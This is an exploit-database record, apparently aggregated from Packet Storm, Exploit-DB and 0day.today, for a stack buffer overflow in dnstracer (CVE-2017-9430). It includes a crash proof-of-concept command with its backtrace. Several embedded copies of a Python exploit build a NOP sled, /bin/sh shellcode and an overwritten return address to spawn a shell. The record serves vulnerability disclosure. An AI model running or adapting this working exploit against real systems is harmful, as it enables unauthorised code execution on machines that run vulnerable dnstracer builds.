ID PACKETSTORM:142799
Type packetstorm
Reporter Hosein Askari
Modified 2017-06-05T00:00:00
Description
`################
#Exploit Title: DNSTracer Stack-based Buffer Overflow
#CVE: CVE-2017-9430
#CWE: CWE-119
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: http://www.mavetju.org
#Version : 1.8.1
#Tested on: Parrot OS
#Date: 04-06-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =
attackers to cause a denial of service (application crash) or possibly hav=
e unspecified other impact via a command line with a long name argument tha=
t is mishandled in a strcpy call for argv[0]. An example threat model is a =
web application that launches dnstracer with an untrusted name string.
###############################
#dnstracer -v $(python -c 'print "A"*1025')
*** buffer overflow detected ***: dnstracer terminated
=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
dnstracer(+0x2c8f)[0x5634368aac8f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
dnstracer(+0x2fca)[0x5634368aafca]
=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D
5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=
sr/bin/dnstracer
563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=
sr/bin/dnstracer
563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=
sr/bin/dnstracer
563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20
563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=
eap]
7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20
7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20
7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20
7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20
7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=
tack]
7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=
var]
7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=
dso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=
syscall]
Aborted
`
{"sourceHref": "https://packetstormsecurity.com/files/download/142799/dnstracer181-overflow.txt", "bulletinFamily": "exploit", "viewCount": 23, "reporter": "Hosein Askari", "references": [], "description": "", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "53fb099e2c37340927f47e7792c43283"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "964864a63b9d607a1b4b005bff8e99fd"}, {"key": "modified", "hash": "b5d669e92f0a0584b38169c3be633711"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b5d669e92f0a0584b38169c3be633711"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2d12b2045cf42e4e073f8d3eda80d54d"}, {"key": "sourceData", "hash": "5d966ee2893334eaddf8e6b931f3d273"}, {"key": "sourceHref", "hash": "9eb5489db90e77c5cf65c08b3acda7f1"}, {"key": "title", "hash": "270fb795c257d6890eae7cc8caa18a07"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "href": "https://packetstormsecurity.com/files/142799/DNSTracer-1.8.1-Buffer-Overflow.html", "modified": "2017-06-05T00:00:00", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-9430"]}, {"type": "exploitdb", "idList": ["EDB-ID:42424", "EDB-ID:42115"]}, {"type": "zdt", "idList": ["1337DAY-ID-27897", "1337DAY-ID-28223"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143654"]}], "modified": "2017-06-05T19:20:29"}, "vulnersScore": 7.5}, "id": "PACKETSTORM:142799", "title": "DNSTracer 1.8.1 Buffer Overflow", "hash": "5fae41c0b4b5082508b47696ec35c14b57629276fcf8ad4937676ffee6736bf2", "edition": 1, "published": "2017-06-05T00:00:00", "type": "packetstorm", "history": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvelist": ["CVE-2017-9430"], "lastseen": "2017-06-05T19:20:29", "sourceData": "`################ \n#Exploit Title: DNSTracer Stack-based Buffer Overflow \n#CVE: CVE-2017-9430 \n#CWE: CWE-119 \n#Exploit Author: Hosein Askari (FarazPajohan) \n#Vendor HomePage: http://www.mavetju.org \n#Version : 1.8.1 \n#Tested on: Parrot OS \n#Date: 04-06-2017 \n#Category: Application \n#Author Mail : hosein.askari@aol.com \n#Description: Stack-based buffer overflow in dnstracer through 1.9 allows = \nattackers to cause a denial of service (application crash) or possibly hav= \ne unspecified other impact via a command line with a long name argument tha= \nt is mishandled in a strcpy call for argv[0]. An example threat model is a = \nweb application that launches dnstracer with an untrusted name string. \n############################### \n \n#dnstracer -v $(python -c 'print \"A\"*1025') \n*** buffer overflow detected ***: dnstracer terminated \n=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D \n/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb] \n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037] \n/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170] \n/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2] \ndnstracer(+0x2c8f)[0x5634368aac8f] \n/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1] \ndnstracer(+0x2fca)[0x5634368aafca] \n=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D \n5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u= \nsr/bin/dnstracer \n563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u= \nsr/bin/dnstracer \n563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u= \nsr/bin/dnstracer \n563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20 \n563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h= \neap] \n7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20 \n7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l= \nib/x86_64-linux-gnu/ld-2.24.so \n7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20 \n7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20 \n7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l= \nib/x86_64-linux-gnu/ld-2.24.so \n7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l= \nib/x86_64-linux-gnu/ld-2.24.so \n7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20 \n7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s= \ntack] \n7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v= \nvar] \n7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v= \ndso] \nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v= \nsyscall] \nAborted \n \n \n`\n"}
{"cve": [{"lastseen": "2017-08-12T10:43:41", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in dnstracer through 1.9 allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a command line with a long name argument that is mishandled in a strcpy call for argv[0]. An example threat model is a web application that launches dnstracer with an untrusted name string.", "modified": "2017-08-11T21:29:08", "published": "2017-06-05T07:29:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9430", "id": "CVE-2017-9430", "title": "CVE-2017-9430", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-08-03T17:42:37", "bulletinFamily": "exploit", "description": "DNSTracer 1.9 - Buffer Overflow. CVE-2017-9430. Local exploit for Linux platform", "modified": "2017-08-03T00:00:00", "published": "2017-08-03T00:00:00", "id": "EDB-ID:42424", "href": "https://www.exploit-db.com/exploits/42424/", "type": "exploitdb", "title": "DNSTracer 1.9 - Buffer Overflow", "sourceData": "# Exploit Title: DNSTracer 1.9 - Buffer Overflow\r\n# Google Dork: [if applicable]\r\n# Date: 03-08-2017\r\n# Exploit Author: j0lama\r\n# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php\r\n# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz\r\n# Version: 1.9\r\n# Tested on: Ubuntu 12.04\r\n# CVE : CVE-2017-9430\r\n# Bug report: https://www.exploit-db.com/exploits/42115/\r\n# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php\r\n\r\n\r\n# Proof of Concept\r\nimport os\r\nfrom subprocess import call\r\n\r\ndef run():\r\n try:\r\n print \"\\nDNSTracer Stack-based Buffer Overflow\"\r\n print \"Author: j0lama\"\r\n print \"Tested with Dnstracer compile without buffer overflow protection\"\r\n\r\n nops = \"\\x90\"*1006\r\n shellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n filling = \"A\"*24\r\n eip = \"\\x2f\\xeb\\xff\\xbf\"\r\n\r\n #buf size = 1057\r\n buf = nops + shellcode + filling + eip\r\n\r\n call([\"./dnstracer\", buf])\r\n\r\n except OSError as e:\r\n if e.errno == os.errno.ENOENT:\r\n print \"\\nDnstracer not found!\\n\"\r\n else:\r\n print \"\\nError executing exploit\\n\"\r\n raise\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n run()\r\n except Exception as e:\r\n print \"Something went wrong\"", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42424/"}, {"lastseen": "2017-06-05T09:13:48", "bulletinFamily": "exploit", "description": "DNSTracer 1.8.1 - Buffer Overflow. CVE-2017-9430. Dos exploit for Linux platform", "modified": "2017-06-05T00:00:00", "published": "2017-06-05T00:00:00", "id": "EDB-ID:42115", "href": "https://www.exploit-db.com/exploits/42115/", "type": "exploitdb", "title": "DNSTracer 1.8.1 - Buffer Overflow", "sourceData": "################\r\n#Exploit Title: DNSTracer Stack-based Buffer Overflow\r\n#CVE: CVE-2017-9430\r\n#CWE: CWE-119\r\n#Exploit Author: Hosein Askari (FarazPajohan)\r\n#Vendor HomePage: http://www.mavetju.org\r\n#Version : 1.8.1\r\n#Tested on: Parrot OS\r\n#Date: 04-06-2017\r\n#Category: Application\r\n#Author Mail : hosein.askari@aol.com\r\n#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =\r\nattackers to cause a denial of service (application crash) or possibly hav=\r\ne unspecified other impact via a command line with a long name argument tha=\r\nt is mishandled in a strcpy call for argv[0]. An example threat model is a =\r\nweb application that launches dnstracer with an untrusted name string.\r\n###############################\r\n\r\n#dnstracer -v $(python -c 'print \"A\"*1025')\r\n*** buffer overflow detected ***: dnstracer terminated\r\n=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]\r\n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]\r\ndnstracer(+0x2c8f)[0x5634368aac8f]\r\n/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]\r\ndnstracer(+0x2fca)[0x5634368aafca]\r\n=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D\r\n5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20\r\n563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=\r\neap]\r\n7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20\r\n7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20\r\n7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=\r\ntack]\r\n7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=\r\nvar]\r\n7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=\r\ndso]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=\r\nsyscall]\r\nAborted\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42115/"}], "packetstorm": [{"lastseen": "2017-08-04T22:43:47", "bulletinFamily": "exploit", "description": "", "modified": "2017-08-04T00:00:00", "published": "2017-08-04T00:00:00", "href": "https://packetstormsecurity.com/files/143654/DNSTracer-1.9-Buffer-Overflow.html", "id": "PACKETSTORM:143654", "title": "DNSTracer 1.9 Buffer Overflow", "type": "packetstorm", "sourceData": "`# Exploit Title: DNSTracer 1.9 - Buffer Overflow \n# Google Dork: [if applicable] \n# Date: 03-08-2017 \n# Exploit Author: j0lama \n# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php \n# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz \n# Version: 1.9 \n# Tested on: Ubuntu 12.04 \n# CVE : CVE-2017-9430 \n# Bug report: https://www.exploit-db.com/exploits/42115/ \n# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php \n \n \n# Proof of Concept \nimport os \nfrom subprocess import call \n \ndef run(): \ntry: \nprint \"\\nDNSTracer Stack-based Buffer Overflow\" \nprint \"Author: j0lama\" \nprint \"Tested with Dnstracer compile without buffer overflow protection\" \n \nnops = \"\\x90\"*1006 \nshellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\" \nfilling = \"A\"*24 \neip = \"\\x2f\\xeb\\xff\\xbf\" \n \n#buf size = 1057 \nbuf = nops + shellcode + filling + eip \n \ncall([\"./dnstracer\", buf]) \n \nexcept OSError as e: \nif e.errno == os.errno.ENOENT: \nprint \"\\nDnstracer not found!\\n\" \nelse: \nprint \"\\nError executing exploit\\n\" \nraise \n \n \nif __name__ == '__main__': \ntry: \nrun() \nexcept Exception as e: \nprint \"Something went wrong\" \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143654/dnstracer19-overflow.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-02-17T21:25:36", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-06-05T00:00:00", "published": "2017-06-05T00:00:00", "href": "https://0day.today/exploit/description/27897", "id": "1337DAY-ID-27897", "title": "DNSTracer 1.8.1 - Buffer Overflow Vulnerability", "type": "zdt", "sourceData": "################\r\n#Exploit Title: DNSTracer Stack-based Buffer Overflow\r\n#CVE: CVE-2017-9430\r\n#CWE: CWE-119\r\n#Exploit Author: Hosein Askari (FarazPajohan)\r\n#Vendor HomePage: http://www.mavetju.org\r\n#Version : 1.8.1\r\n#Tested on: Parrot OS\r\n#Date: 04-06-2017\r\n#Category: Application\r\n#Author Mail : [email\u00a0protected]\r\n#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =\r\nattackers to cause a denial of service (application crash) or possibly hav=\r\ne unspecified other impact via a command line with a long name argument tha=\r\nt is mishandled in a strcpy call for argv[0]. An example threat model is a =\r\nweb application that launches dnstracer with an untrusted name string.\r\n###############################\r\n \r\n#dnstracer -v $(python -c 'print \"A\"*1025')\r\n*** buffer overflow detected ***: dnstracer terminated\r\n=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]\r\n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]\r\ndnstracer(+0x2c8f)[0x5634368aac8f]\r\n/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]\r\ndnstracer(+0x2fca)[0x5634368aafca]\r\n=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D\r\n5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20\r\n563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=\r\neap]\r\n7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20\r\n7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20\r\n7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=\r\ntack]\r\n7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=\r\nvar]\r\n7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=\r\ndso]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=\r\nsyscall]\r\nAborted\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27897"}, {"lastseen": "2018-01-04T19:02:21", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2017-08-03T00:00:00", "published": "2017-08-03T00:00:00", "href": "https://0day.today/exploit/description/28223", "id": "1337DAY-ID-28223", "title": "DNSTracer 1.9 - Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: DNSTracer 1.9 - Buffer Overflow\r\n# Google Dork: [if applicable]\r\n# Exploit Author: j0lama\r\n# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php\r\n# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz\r\n# Version: 1.9\r\n# Tested on: Ubuntu 12.04\r\n# CVE : CVE-2017-9430\r\n# Bug report: https://www.exploit-db.com/exploits/42115/\r\n# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php\r\n \r\n \r\n# Proof of Concept\r\nimport os\r\nfrom subprocess import call\r\n \r\ndef run():\r\n try:\r\n print \"\\nDNSTracer Stack-based Buffer Overflow\"\r\n print \"Author: j0lama\"\r\n print \"Tested with Dnstracer compile without buffer overflow protection\"\r\n \r\n nops = \"\\x90\"*1006\r\n shellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n filling = \"A\"*24\r\n eip = \"\\x2f\\xeb\\xff\\xbf\"\r\n \r\n #buf size = 1057\r\n buf = nops + shellcode + filling + eip\r\n \r\n call([\"./dnstracer\", buf])\r\n \r\n except OSError as e:\r\n if e.errno == os.errno.ENOENT:\r\n print \"\\nDnstracer not found!\\n\"\r\n else:\r\n print \"\\nError executing exploit\\n\"\r\n raise\r\n \r\n \r\nif __name__ == '__main__':\r\n try:\r\n run()\r\n except Exception as e:\r\n print \"Something went wrong\"\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28223"}]}
